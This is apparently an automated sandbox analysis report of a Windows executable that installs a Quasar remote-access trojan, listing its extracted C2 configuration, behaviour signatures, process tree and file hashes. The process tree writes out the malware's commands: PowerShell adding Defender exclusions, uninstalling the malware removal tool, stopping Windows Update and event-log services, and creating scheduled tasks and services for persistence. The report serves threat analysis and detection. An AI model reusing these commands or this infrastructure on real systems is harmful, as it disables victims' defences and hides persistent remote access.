Analysis
-
max time kernel
20s -
max time network
54s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
-
submitted
14-05-2024 01:35
General
-
Target
a45c739b9f551d8633053381950f20a617ae2fe9c1d96d4f433d8ffa3015fb5e.exe
-
Size
24.6MB
-
MD5
4bb4ff4b1fa6c7e122557d8a55826242
-
SHA1
241427d58cc7787fd24536821080244f344ddc74
-
SHA256
a45c739b9f551d8633053381950f20a617ae2fe9c1d96d4f433d8ffa3015fb5e
-
SHA512
4b6e380061a3f05583ad2e14e791b8c61d237e92a45d0abbadcc24fbe7aae3b63c18a02d665a5e2d8cd0e05dee29779f24658f585d9f1272e4fd9bc0532fae16
-
SSDEEP
786432:ZXiuaHp1WxVMCLvYEpd3hA/IlF1ZAhfk:vaHfsVDw0DAA31ZAhf
Malware Config
Extracted
quasar
1.4.1
Webhook
bardu3662.duckdns.org:9733
afa58199-2aae-4e08-8ef4-8e4ef39bc0aa
-
encryption_key
080342EF5ED2B5D16317695CC4327BF2FFC034AA
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
Update
-
subdirectory
ApplicationFrameHost
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 4 TTPs
-
Executes dropped EXE 7 IoCs
-
Loads dropped DLL 14 IoCs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Detects Pyinstaller 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 42 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a45c739b9f551d8633053381950f20a617ae2fe9c1d96d4f433d8ffa3015fb5e.exe"C:\Users\Admin\AppData\Local\Temp\a45c739b9f551d8633053381950f20a617ae2fe9c1d96d4f433d8ffa3015fb5e.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAawBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAaQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAcgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdgBwACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\R3nzSkin_Injector.exe"C:\Users\Admin\AppData\Local\Temp\R3nzSkin_Injector.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Update.exe"C:\Users\Admin\AppData\Roaming\Update.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ApplicationFrameHost\RuntimeBroker.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\ApplicationFrameHost\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\ApplicationFrameHost\RuntimeBroker.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ApplicationFrameHost\RuntimeBroker.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\SearchServices.exe"C:\Users\Admin\AppData\Roaming\SearchServices.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\SearchServices.exe"C:\Users\Admin\AppData\Roaming\SearchServices.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\SecurityHealthServices.exe"C:\Users\Admin\AppData\Local\SecurityHealthServices.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "KPAADCYR"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "KPAADCYR" binpath= "C:\ProgramData\xskudridktfu\vmarkghgnurz.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "KPAADCYR"3⤵
- Launches sc.exe
-
C:\ProgramData\xskudridktfu\vmarkghgnurz.exeC:\ProgramData\xskudridktfu\vmarkghgnurz.exe1⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5cce0fbfd023768a78c863dfdd16a7c91
SHA115c5d81b1ba52bdf355967a0c777d70471dd27a8
SHA256eebcd0be406b8ba8121a3f12623344bd91e8f65fee400054156e1aa4099a027b
SHA512d186b1f32b886c7537b2d1e725a3c754dbc4cdeb9870c5e8bd1b5723a79b5496c2fc183fb292ede88ce1bb476cfb073b45aabca335dbac888b7e554da8f950f9
-
Filesize
1.3MB
MD5d967dc1c4bdbe49ae20936c8e7623e89
SHA1370460a4d2766f69ebe818a0001f68feb57fd2ea
SHA256fc8629475b5b9f24093ab70b4c7f01a12d93ee64fa533ae79ed68c63d68d4c53
SHA512e5f64909356695da07a765ce908f24620d7d1e556436df0e211538e847b0faa4b2eba8631ff4bbf383abfd2731c460777d7568d870eebc12dba1e0b64deb2fd5
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
2.2MB
MD59f632a56ffcb63adfb85ee996f67d8fa
SHA15d5e4c6e5666e05a04020f976e4ee429829e1a3b
SHA256f89130f6d8a2e6da8484b502412cbd622f38b8f089cde7fc6c43159ecf3a6a5c
SHA51242dda67c617b4c1382afb124c93c314e630c1f30fc1b19aca38bd24574e1bf0cdbb6635ccce578d3ffa48f0f8653bdf0ac84201c470edd2d774bbd3dcd59d50a
-
Filesize
299KB
MD58af17734385f55dc58f1ca38bce22312
SHA16983464a9c6391bdd1e7b0aa275acf0a49c12d76
SHA256ea034d7b08a538f827293c3b0742d4c178708afdfd0f45d47cad99967b311a97
SHA51261c076bd92de12fa0c48ca5e4b5ea263c3d4e39e9821bdabc98a84ed0d37d40065095e7ea08bfd35fd47d9fa27b7f6053992844044b9f5d6677ea7a19e25b024
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
21KB
MD5724223109e49cb01d61d63a8be926b8f
SHA1072a4d01e01dbbab7281d9bd3add76f9a3c8b23b
SHA2564e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210
SHA51219b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c
-
Filesize
4.3MB
MD5deaf0c0cc3369363b800d2e8e756a402
SHA13085778735dd8badad4e39df688139f4eed5f954
SHA256156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d
SHA5125cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989
-
Filesize
7KB
MD5a4d99a753b2439b0615ae7d0e82985ab
SHA1a957839fc556cb31532abe58f0b88b1a8aac33d2
SHA256567e48e2162555c965076917e43e426fd7f66bcf211ce02d4bd9923fa4abb05c
SHA5123eae17f18ede466970bf00156aa22f95863856dc042f2802a6e4f75db51a4f843136fa7ba13685a50bf1f5345fb2a449ca9d31904be010d16633d59fac454f6c
-
Filesize
18.4MB
MD5e35564f0bad6c37132dc4157519f52e3
SHA1d4e2b4359a48ca64c46b20a4c61ffbf693abecae
SHA256c0f4d1c48786c2ee5f898bdfe99b89f5d538d04c38b63f066bd69357024fb13c
SHA512ed14c65869cf31df94166901eef6b2b42bbe309a9d1c58180122e08a3e9e5e84723cddfe1597ce1d8ec32254fdf982c383623f14ed2e2809cfb0057355890948
-
Filesize
2KB
MD52b19df2da3af86adf584efbddd0d31c0
SHA1f1738910789e169213611c033d83bc9577373686
SHA25658868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA5124a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
1.4MB
MD5243b3058eb316ffbd8612cbb8df483cb
SHA10bc638b80f153fa5df18b08362da20aadf9a157d
SHA256dc7cefa490a12628d970c5be53463efd6d790a877f2fcf736f97ea62cc9cd1bc
SHA512728fbcac0629630f3a6edfe8d3b52b6a85ed3bcf0a8301439187f89bdbd4a30dc5a896a2cfb2d64066479fe06fc1304a4601a6d372aa5cba56faa15a690fea41
-
Filesize
2.1MB
MD5d6b315dff67913bbcc9718ed44d4cfcf
SHA12e34900c57ba29528064274c3475a4cfbf5c48e6
SHA2569e8a003bb3fbd7da3698aced2614bde5f9d73a69d380636e7d69818eeda8835e
SHA51204b48cfc57cc854c68617114c1e8ac20488d4357505c5177393ab65ebdb50fe4b9e0558d997eb700694eba39cff4ee67790d3c653bd045cf8d38890fa4e344b6
-
Filesize
2.8MB
MD55143fe6d0c9218c03877131e7ff8f195
SHA14bb288f628d2e6d498f79196d7b94400f6e4a3c0
SHA256cc0323377f6720d55fe5fffb473bab139a6b3c26b2ff9f5b0433caad1fdb3280
SHA5129c4194ea2dfd10267ed8fc2b21d6b82a1425254cd6bae28e4727ee93ff4b1888db24fb92ae8a1a7e46759ad39db45dff774b2f2795ca115df3e0166a3821c291
-
Filesize
21KB
MD51c58526d681efe507deb8f1935c75487
SHA10e6d328faf3563f2aae029bc5f2272fb7a742672
SHA256ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2
SHA5128edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1
-
Filesize
18KB
MD5bfffa7117fd9b1622c66d949bac3f1d7
SHA1402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2
SHA2561ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e
SHA512b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f
-
Filesize
21KB
MD5517eb9e2cb671ae49f99173d7f7ce43f
SHA14ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab
SHA25657cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54
SHA512492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be
-
Filesize
21KB
MD5d12403ee11359259ba2b0706e5e5111c
SHA103cc7827a30fd1dee38665c0cc993b4b533ac138
SHA256f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781
SHA5129004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0
-
Filesize
992KB
MD50e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA14189f4459c54e69c6d3155a82524bda7549a75a6
SHA2568a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd
-
Filesize
3.1MB
MD5f91699f2ff3f446461a302ea2d69be44
SHA1caf1e89a10b97668773e6150dd4b3cecee194c86
SHA256bccae30d15564418d4f8ee309c47adaa054039a1a68ea59ee95b6a5ef92d8487
SHA5122eb25181445c88044960ad65417cee3c14d83be935c6fc471288687b02c3113851b7b4c980b73994d90688f6e551eeb76001e8cfc120922dacbd5d8c7e3cbc4d
-
Filesize
144KB
-
Filesize
64KB
-
Filesize
144KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
3.1MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
1.7MB
-
Filesize
1.1MB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
3.1MB
-
Filesize
320KB
-
Filesize
32KB
-
Filesize
2.9MB